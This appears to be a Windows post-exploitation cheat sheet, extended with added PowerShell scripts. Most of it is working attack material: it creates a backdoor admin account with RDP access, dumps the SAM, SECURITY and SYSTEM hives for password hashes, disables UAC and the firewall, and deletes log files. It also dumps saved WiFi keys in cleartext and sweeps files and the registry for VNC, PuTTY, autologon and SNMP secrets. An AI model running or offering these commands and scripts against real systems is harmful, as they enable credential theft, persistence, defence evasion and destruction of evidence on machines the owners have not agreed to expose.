Windows

Add Admin User w/ RDP

net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" <username> /ADD
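The same three steps as an added example (not code from the original page), using the LocalAccounts cmdlets instead of net.exe so the result can be verified from the same script and undone with the paired removal. The account name and password are placeholders, not values from the page; run it from an elevated session.

```powershell
# Added example (not from the original page): the net user / net localgroup
# sequence above done with the LocalAccounts cmdlets, with a membership check
# and a matching removal. Run elevated. Account name and password are
# placeholders, not values from the page.
$UserName = 'svc_backup'                                                      # assumption: placeholder
$Password = ConvertTo-SecureString 'Chang3Me!Now-2024' -AsPlainText -Force    # assumption: placeholder

function Add-RdpAdmin {
    param([string]$Name, [securestring]$Pass)
    # New-LocalUser throws if the name already exists, which is the safe failure
    New-LocalUser -Name $Name -Password $Pass -PasswordNeverExpires -AccountNeverExpires | Out-Null
    Add-LocalGroupMember -Group 'Administrators'       -Member $Name
    Add-LocalGroupMember -Group 'Remote Desktop Users' -Member $Name
    # Verify: member names come back as COMPUTER\user, so match on the suffix
    foreach ($group in 'Administrators', 'Remote Desktop Users') {
        $hit = Get-LocalGroupMember -Group $group | Where-Object { $_.Name -like "*\$Name" }
        [pscustomobject]@{ Group = $group; User = $Name; Member = [bool]$hit }
    }
}

function Remove-RdpAdmin {
    param([string]$Name)
    # Deleting the account also drops its group memberships
    Remove-LocalUser -Name $Name
}

Add-RdpAdmin -Name $UserName -Pass $Password | Format-Table -AutoSize
# Remove-RdpAdmin -Name $UserName    # equivalent of: net user <username> /del
```

Both the account creation and the group changes are written to the Security log (event 4720 for the new user, 4732 for each local group addition), so expect them to show up in any SIEM that watches the Administrators group.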

Remove User

net user badaccount /del

Tasks / Services

Start or stop a service

net start|stop servicename

View the currently running tasklist

tasklist

Kill a task by name

taskkill /F /IM task.exe

Kill a task by PID

taskkill /PID PID /F

Base64 encoding / decoding

base64 encode
certutil -encode inputfile outputfile

base64 decode
certutil -decode inputfile outputfile

certutil -encode wraps the output in -----BEGIN CERTIFICATE----- / -----END CERTIFICATE----- lines and breaks it every 64 characters; -decode accepts that same format.

Dump passwords via reg.exe

reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system_backup

Needs an elevated shell. Take all three hives together: SYSTEM holds the boot key that unlocks the hashes in SAM and the LSA secrets in SECURITY.
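The hive export wrapped with the checks a practitioner wants before trusting the files, as an added example (not from the original page): it refuses to run unelevated, writes the three hives next to each other and reports exit code and size for each. The output directory is a placeholder.

```powershell
# Added example (not from the original page): save the SAM, SECURITY and
# SYSTEM hives with reg.exe and confirm each export landed. Must run elevated;
# the output folder is a placeholder.
$OutDir = 'C:\Windows\Temp\hives'    # assumption: placeholder directory

function Export-Hives {
    param([string]$Dir)
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal $id
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        throw 'reg save of hklm\sam, hklm\security and hklm\system needs an elevated shell'
    }
    New-Item -ItemType Directory -Force -Path $Dir | Out-Null
    foreach ($hive in 'sam', 'security', 'system') {
        $dest = Join-Path $Dir "$hive.hiv"
        # /y overwrites without prompting; reg.exe sets a non-zero exit code on failure
        & reg.exe save "hklm\$hive" $dest /y | Out-Null
        [pscustomobject]@{
            Hive     = $hive
            Path     = $dest
            ExitCode = $LASTEXITCODE
            Bytes    = if (Test-Path $dest) { (Get-Item $dest).Length } else { 0 }
        }
    }
}

Export-Hives -Dir $OutDir | Format-Table -AutoSize
```

A zero-byte or missing file with a non-zero exit code means the save failed even though reg.exe printed nothing useful through the pipe. The command line `reg.exe save hklm\sam` is one of the most widely signatured credential-access patterns, so assume it is logged.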

Security settings

    Allow RDP
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    Disable UAC (Meterpreter reg command; the change takes effect after a reboot)
    reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
    reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system

    Refresh policies
    gpupdate /force

    Disable the Firewall
    netsh advfirewall set allprofiles state off

    If any of these values is managed by Group Policy, gpupdate (or the periodic refresh) puts the policy value back.
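The same three settings driven from PowerShell, as an added example that is not part of the original page: it snapshots the current RDP, UAC and firewall state to a file before touching anything, applies the weak state the lines above produce, and can restore the snapshot afterwards. The snapshot path is a placeholder; an elevated session is required.

```powershell
# Added example (not from the original page): record the current values of the
# settings above before changing them, so the box can be put back the way it
# was. Elevated session required. The snapshot path is a placeholder.
$SnapshotPath = "$env:TEMP\secsettings.json"   # assumption: placeholder location
$RdpKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-SecState {
    $fw = [ordered]@{}
    foreach ($p in Get-NetFirewallProfile) { $fw[$p.Name] = ($p.Enabled -eq 'True') }
    [pscustomobject]@{
        fDenyTSConnections = (Get-ItemProperty $RdpKey).fDenyTSConnections   # 1 = RDP refused
        EnableLUA          = (Get-ItemProperty $UacKey).EnableLUA            # 1 = UAC on
        Firewall           = [pscustomobject]$fw                             # per-profile on/off
    }
}

function Save-SecState {
    Get-SecState | ConvertTo-Json -Depth 3 | Set-Content -Path $SnapshotPath
}

function Set-SecState {
    param([int]$DenyRdp, [int]$Uac, [bool]$FirewallOn)
    Set-ItemProperty -Path $RdpKey -Name fDenyTSConnections -Value $DenyRdp -Type DWord
    # EnableLUA is read at boot; the UAC change only applies after a restart
    Set-ItemProperty -Path $UacKey -Name EnableLUA -Value $Uac -Type DWord
    Set-NetFirewallProfile -All -Enabled $(if ($FirewallOn) { 'True' } else { 'False' })
}

function Restore-SecState {
    $s = Get-Content -Path $SnapshotPath -Raw | ConvertFrom-Json
    if ($null -ne $s.fDenyTSConnections) {
        Set-ItemProperty -Path $RdpKey -Name fDenyTSConnections -Value ([int]$s.fDenyTSConnections) -Type DWord
    }
    if ($null -ne $s.EnableLUA) {
        Set-ItemProperty -Path $UacKey -Name EnableLUA -Value ([int]$s.EnableLUA) -Type DWord
    }
    foreach ($name in 'Domain', 'Private', 'Public') {
        Set-NetFirewallProfile -Name $name -Enabled $(if ($s.Firewall.$name) { 'True' } else { 'False' })
    }
}

Save-SecState
Get-SecState                                         # before
Set-SecState -DenyRdp 0 -Uac 0 -FirewallOn $false    # the state the reg/netsh lines above produce
Get-SecState                                         # after
# Restore-SecState                                   # when done
```

Disabling all firewall profiles is noisier than opening the one port you need; for RDP alone, enabling the built-in "Remote Desktop" rule group (`Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'`) leaves the rest of the policy intact.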

Services status

sc queryex type= service state= all
netstat -ano

Start & stop a service:

sc start <SERVICE NAME>
sc stop <SERVICE NAME>

Reading values from registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Interesting files

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
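A triage pass over the list above, as an added example that is not part of the original page: it expands the environment variables, tells you whether each file exists, and, more usefully, whether the current token can actually open it for reading, separating "access denied" from "exists but locked by the OS" (pagefile.sys, the loaded ntuser.dat). The paths are exactly the ones on this page.

```powershell
# Added example (not from the original page): walk the list above, expand the
# environment variables, and report existence, size and whether the current
# token can read each file. Paths are the ones listed on this page.
$Interesting = @(
    '%SYSTEMDRIVE%\pagefile.sys',
    '%WINDIR%\debug\NetSetup.log',
    '%WINDIR%\repair\sam',
    '%WINDIR%\repair\system',
    '%WINDIR%\repair\software',
    '%WINDIR%\repair\security',
    '%WINDIR%\iis6.log',
    '%WINDIR%\system32\config\AppEvent.Evt',
    '%WINDIR%\system32\config\SecEvent.Evt',
    '%WINDIR%\system32\config\default.sav',
    '%WINDIR%\system32\config\security.sav',
    '%WINDIR%\system32\config\software.sav',
    '%WINDIR%\system32\config\system.sav',
    '%WINDIR%\system32\CCM\logs\*.log',
    '%USERPROFILE%\ntuser.dat',
    '%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat',
    '%WINDIR%\System32\drivers\etc\hosts'
)

function Test-Readable {
    param([string]$Path)
    # Ask for the most permissive sharing so a sharing violation (file in use)
    # is reported separately from an ACL denial
    $share = [IO.FileShare]::ReadWrite -bor [IO.FileShare]::Delete
    try {
        $fs = [IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Read, $share)
        $fs.Dispose()
        return 'readable'
    } catch [UnauthorizedAccessException] {
        return 'access denied'
    } catch [IO.IOException] {
        return 'locked: ' + $_.Exception.Message.Split("`n")[0]
    } catch {
        return 'error: ' + $_.Exception.GetType().Name
    }
}

function Get-InterestingFiles {
    foreach ($raw in $Interesting) {
        $expanded = [Environment]::ExpandEnvironmentVariables($raw)
        # -Force includes hidden/system files; wildcards (CCM\logs\*.log) may expand to many or none
        $hits = @(Get-Item -Path $expanded -Force -ErrorAction SilentlyContinue)
        if ($hits.Count -eq 0) {
            [pscustomobject]@{ Path = $expanded; Status = 'missing'; Bytes = $null; Modified = $null }
            continue
        }
        foreach ($f in $hits) {
            [pscustomobject]@{
                Path     = $f.FullName
                Status   = Test-Readable $f.FullName
                Bytes    = $f.Length
                Modified = $f.LastWriteTime
            }
        }
    }
}

Get-InterestingFiles | Sort-Object Status | Format-Table -AutoSize
```

Files reported as "locked" (the live ntuser.dat, pagefile.sys) are readable only through a Volume Shadow Copy or an offline disk; "access denied" ones are the targets for a later elevated run.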

List logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

This removes every *.log file on the current drive (hidden and read-only ones included); it does not clear the Event Log channels listed by wevtutil el.

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Win32_Product only lists MSI-installed packages, and enumerating it makes Windows Installer run a consistency check on every package, which is slow and writes MsiInstaller events to the Application log.

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g. *pass*)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config: cmd.exe treats = as an argument separator, so this is the same as dir /s *pass* *key* *vnc* *.config*.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords

List saved profiles (AP SSIDs)

netsh wlan show profile
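Listing the profiles is only the first half; the key itself comes from netsh's key=clear option per profile. As an added example that is not part of the original page, the loop below enumerates every saved profile and pulls its authentication type and cleartext key. Parsing relies on the English netsh labels ("All User Profile", "Key Content", "Authentication"); all-user profiles usually need an elevated prompt before netsh will show the key.

```powershell
# Added example (not from the original page): list every saved WLAN profile
# and read its key in clear with netsh ... key=clear. Parsing assumes the
# English netsh output labels.
function Get-WlanKeys {
    $profiles = netsh wlan show profiles |
        Select-String -Pattern 'All User Profile\s*:\s*(.+)$' |
        ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }

    foreach ($ssid in $profiles) {
        $detail = netsh wlan show profile name="$ssid" key=clear
        # "Key Content" is only printed for PSK networks and only when the caller may read the key
        $key = $detail | Select-String 'Key Content\s*:\s*(.+)$' |
               ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() } | Select-Object -First 1
        $auth = $detail | Select-String 'Authentication\s*:\s*(.+)$' |
                ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() } | Select-Object -First 1
        [pscustomobject]@{
            SSID           = $ssid
            Authentication = $auth
            Key            = $(if ($key) { $key } else { '<none or not readable>' })
        }
    }
}

Get-WlanKeys | Format-Table -AutoSize
```

Enterprise (802.1X) profiles report an Authentication of WPA2-Enterprise and no Key Content; their credentials live in the user's credential store, not in the profile.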

Interesting Registries

VNC

reg query "HKCU\Software\ORL\WinVNC3" /v Password [VNC]

Password is a value under the WinVNC3 key, an 8-byte blob obfuscated with the fixed VNC DES key rather than cleartext. RealVNC 4 and later keep theirs under HKLM\SOFTWARE\RealVNC\WinVNC4 instead.

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" [Windows]

Look for DefaultUserName, DefaultDomainName and DefaultPassword with AutoAdminLogon set to 1.

SNMP Parameters

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" [SNMP PARAMS]

The community strings are the value names under the Parameters\ValidCommunities subkey.

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" [Putty Plaintext Credentials]

Each saved session stores HostName, UserName and, when a proxy is configured, ProxyPassword in the clear. PuTTY never saves the SSH login password itself.

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
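The reg query sweeps on this page match only REG_SZ data and stop at the first key the caller cannot open. As an added example that is not part of the original page, the script below matches a regex against value names and against REG_SZ, REG_EXPAND_SZ and REG_MULTI_SZ data, keeps going past unreadable keys, and checks the well-known locations listed above with a targeted pattern before the broad sweep. The root keys, patterns and the ValidCommunities subkey name are assumptions you can adjust.

```powershell
# Added example (not from the original page): a registry sweep that goes
# further than reg query /f ... /t REG_SZ. Roots, patterns and the
# ValidCommunities subkey name are assumptions.
$Roots   = 'HKLM:\SOFTWARE', 'HKLM:\SYSTEM\CurrentControlSet\Services', 'HKCU:\Software'
$Pattern = '(?i)pass(word|wd)?|pwd|secret|credential'

$KnownSpots   = 'HKCU:\Software\ORL\WinVNC3',
                'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
                'HKCU:\Software\SimonTatham\PuTTY\Sessions\*'
$KnownPattern = '(?i)^(Password|DefaultUserName|DefaultDomainName|DefaultPassword|AutoAdminLogon|HostName|UserName|ProxyUsername|ProxyPassword|PublicKeyFile)$'
$SnmpCommunities = 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities'  # assumption: usual subkey

function Search-RegistryCreds {
    param([string[]]$Paths, [string]$Regex, [switch]$Recurse)
    foreach ($p in $Paths) {
        $keys = @(Get-Item -Path $p -ErrorAction SilentlyContinue)
        # Access-denied subkeys are non-terminating errors, so the walk continues past them
        if ($Recurse) { $keys += @(Get-ChildItem -Path $p -Recurse -ErrorAction SilentlyContinue) }
        foreach ($k in $keys) {
            foreach ($name in $k.GetValueNames()) {
                $kind = $k.GetValueKind($name)
                # Keep %VARS% unexpanded so the stored text is what gets matched
                $data = $k.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
                $text = if ($data -is [array]) { $data -join ' ' } else { [string]$data }
                $isText = $kind -in 'String', 'ExpandString', 'MultiString'
                if ($name -match $Regex -or ($isText -and $text -match $Regex)) {
                    [pscustomobject]@{ Key = $k.Name; Value = $name; Kind = $kind; Data = $text }
                }
            }
        }
    }
}

# 1. Known spots from this page, targeted value names only
Search-RegistryCreds -Paths $KnownSpots -Regex $KnownPattern | Format-Table -AutoSize -Wrap
# 2. SNMP community strings are the value names themselves, so match everything under that key
Search-RegistryCreds -Paths $SnmpCommunities -Regex '.' | Format-Table -AutoSize -Wrap
# 3. Broad sweep (recursing HKLM\SOFTWARE can take a few minutes)
Search-RegistryCreds -Paths $Roots -Regex $Pattern -Recurse | Format-Table -AutoSize -Wrap
```

Binary and DWORD values are only matched on their names; the VNC Password blob therefore shows up by name and still needs the fixed-key DES step to recover the cleartext.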